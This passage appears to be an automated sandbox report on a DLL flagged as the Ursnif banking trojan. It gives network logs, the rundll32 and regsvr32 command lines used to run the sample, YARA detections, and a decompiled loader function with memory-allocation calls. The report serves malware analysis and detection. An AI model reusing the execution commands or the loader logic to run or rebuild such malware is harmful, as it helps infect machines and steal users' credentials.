                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST8.8.8.8192.168.2.50x26dNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST8.8.8.8192.168.2.50x26dNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST8.8.8.8192.168.2.50x26dNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.339169025 CEST104.20.185.68443192.168.2.549717CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.344616890 CEST104.20.185.68443192.168.2.549718CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.442049026 CEST151.101.1.44443192.168.2.549729CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.467464924 CEST151.101.1.44443192.168.2.549731CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.480766058 CEST151.101.1.44443192.168.2.549730CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.627639055 CEST151.101.1.44443192.168.2.549734CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.627831936 CEST151.101.1.44443192.168.2.549732CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.628279924 CEST151.101.1.44443192.168.2.549733CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:14
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                                                                                                                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                                                                                                                        File size:116736 bytes
                                                                                                                                                                                                                                                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:14
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:14
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                                                                                                                                                                                                                                                        Imagebase:0x7ff64e5e0000
                                                                                                                                                                                                                                                        File size:20992 bytes
                                                                                                                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:14
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                                                                                                                                                                                                                                                        Imagebase:0x1300000
                                                                                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:15
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        Imagebase:0x7ff6f43d0000
                                                                                                                                                                                                                                                        File size:823560 bytes
                                                                                                                                                                                                                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:17
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                                                                                                                                                                                                                                                        Imagebase:0x1300000
                                                                                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:20:30:18
                                                                                                                                                                                                                                                        Start date:03/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5932 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                        File size:822536 bytes
                                                                                                                                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                          			E6DDF17A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t21 = E6DDF146C();
                                                                                                                                                                                                                                                          				_v52 = _t21;
                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					goto L1;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                          					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                          					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                          					_t45 = 9;
                                                                                                                                                                                                                                                          					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                          					_t26 = E6DDF15A3(0, _t54); // executed
                                                                                                                                                                                                                                                          					_v56 = _t26;
                                                                                                                                                                                                                                                          					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                          					_t21 = _v56;
                                                                                                                                                                                                                                                          				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t27 = E6DDF1C12(_t45);
                                                                                                                                                                                                                                                          				_v52 = _t27;
                                                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                          					_t21 = _v52;
                                                                                                                                                                                                                                                          					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                          						_t21 = GetLastError();
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                          					_t56 = E6DDF1CA4(E6DDF16EC,  &_v28);
                                                                                                                                                                                                                                                          					if(_t56 == 0) {
                                                                                                                                                                                                                                                          						_v56 = GetLastError();
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                          						_v56 = _t31;
                                                                                                                                                                                                                                                          						if(_t31 == 0) {
                                                                                                                                                                                                                                                          							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						CloseHandle(_t56);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				if(E6DDF1D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                          					 *0x6ddf41b8 = 0;
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t44 = _v48;
                                                                                                                                                                                                                                                          				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                          				_t50 =  *_t57(_t44, 0, 0);
                                                                                                                                                                                                                                                          				if(_t50 == 0) {
                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                          					 *0x6ddf41b8 = _t44;
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                          				_t39 = E6DDF1C8F(_t50 + _t15);
                                                                                                                                                                                                                                                          				 *0x6ddf41b8 = _t39;
                                                                                                                                                                                                                                                          				if(_t39 == 0) {
                                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					 *_t57(_t44, _t39, _t50);
                                                                                                                                                                                                                                                          					E6DDF136A(_t44);
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                          0x6ddf17b3
                                                                                                                                                                                                                                                          0x6ddf17bc
                                                                                                                                                                                                                                                          0x6ddf17c0
                                                                                                                                                                                                                                                          0x6ddf18c8
                                                                                                                                                                                                                                                          0x6ddf18ce
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf17c6
                                                                                                                                                                                                                                                          0x6ddf17c6
                                                                                                                                                                                                                                                          0x6ddf17cb
                                                                                                                                                                                                                                                          0x6ddf17d1
                                                                                                                                                                                                                                                          0x6ddf17e0
                                                                                                                                                                                                                                                          0x6ddf17e1
                                                                                                                                                                                                                                                          0x6ddf17e4
                                                                                                                                                                                                                                                          0x6ddf17e7
                                                                                                                                                                                                                                                          0x6ddf17f0
                                                                                                                                                                                                                                                          0x6ddf17f4
                                                                                                                                                                                                                                                          0x6ddf17fa
                                                                                                                                                                                                                                                          0x6ddf17fe
                                                                                                                                                                                                                                                          0x6ddf1805
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf180b
                                                                                                                                                                                                                                                          0x6ddf1812
                                                                                                                                                                                                                                                          0x6ddf1816
                                                                                                                                                                                                                                                          0x6ddf18b9
                                                                                                                                                                                                                                                          0x6ddf18b9
                                                                                                                                                                                                                                                          0x6ddf18c0
                                                                                                                                                                                                                                                          0x6ddf18c2
                                                                                                                                                                                                                                                          0x6ddf18c2
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf18c0
                                                                                                                                                                                                                                                          0x6ddf181f
                                                                                                                                                                                                                                                          0x6ddf1872
                                                                                                                                                                                                                                                          0x6ddf1872
                                                                                                                                                                                                                                                          0x6ddf1883
                                                                                                                                                                                                                                                          0x6ddf1887
                                                                                                                                                                                                                                                          0x6ddf18b5
                                                                                                                                                                                                                                                          0x6ddf1889
                                                                                                                                                                                                                                                          0x6ddf188c
                                                                                                                                                                                                                                                          0x6ddf1894
                                                                                                                                                                                                                                                          0x6ddf1898
                                                                                                                                                                                                                                                          0x6ddf18a0
                                                                                                                                                                                                                                                          0x6ddf18a0
                                                                                                                                                                                                                                                          0x6ddf18a7
                                                                                                                                                                                                                                                          0x6ddf18a7
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1887
                                                                                                                                                                                                                                                          0x6ddf182d
                                                                                                                                                                                                                                                          0x6ddf186c
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf186c
                                                                                                                                                                                                                                                          0x6ddf182f
                                                                                                                                                                                                                                                          0x6ddf1833
                                                                                                                                                                                                                                                          0x6ddf183e
                                                                                                                                                                                                                                                          0x6ddf1842
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x6ddf1844
                                                                                                                                                                                                                                                          0x6ddf1849
                                                                                                                                                                                                                                                          0x6ddf1850
                                                                                                                                                                                                                                                          0x6ddf1855
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1857
                                                                                                                                                                                                                                                          0x6ddf185a
                                                                                                                                                                                                                                                          0x6ddf185d
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf185d

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDF17B8,751463F0,00000000), ref: 6DDF147B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: GetVersion.KERNEL32 ref: 6DDF148A
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: GetCurrentProcessId.KERNEL32 ref: 6DDF1499
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDF14B2
                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,751463F0,00000000), ref: 6DDF17CB
                                                                                                                                                                                                                                                          • SwitchToThread.KERNEL32 ref: 6DDF17D1
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDF15F9
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDF17EC), ref: 6DDF168B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDF16A6
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,00000000), ref: 6DDF17F4
                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6DDF183C
                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6DDF185A
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,6DDF16EC,?,00000000), ref: 6DDF188C
                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 6DDF18A0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DDF18A7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(6DDF16EC,?,00000000), ref: 6DDF18AF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DDF18C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2280543912-0
                                                                                                                                                                                                                                                          • Opcode ID: e81c80fd7f690b2be0f15f0099e7f67bbbd3af30a1d6db6743007276aba34ebd
                                                                                                                                                                                                                                                          • Instruction ID: 41abd2c9c64a475964c50c369dceb5c0e3f62a596db5ba94c85f068c08f7d71e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81c80fd7f690b2be0f15f0099e7f67bbbd3af30a1d6db6743007276aba34ebd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38317EB1848712BBD711FF659944A6B77FCEA86754F130E2AF964C2140E730C9068AB2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6DE71E18), ref: 6DE72480
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6DE71E7C), ref: 6DE724B7
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6DE72517
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE7254D
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00000000,00000004,6DE723A2), ref: 6DE72652
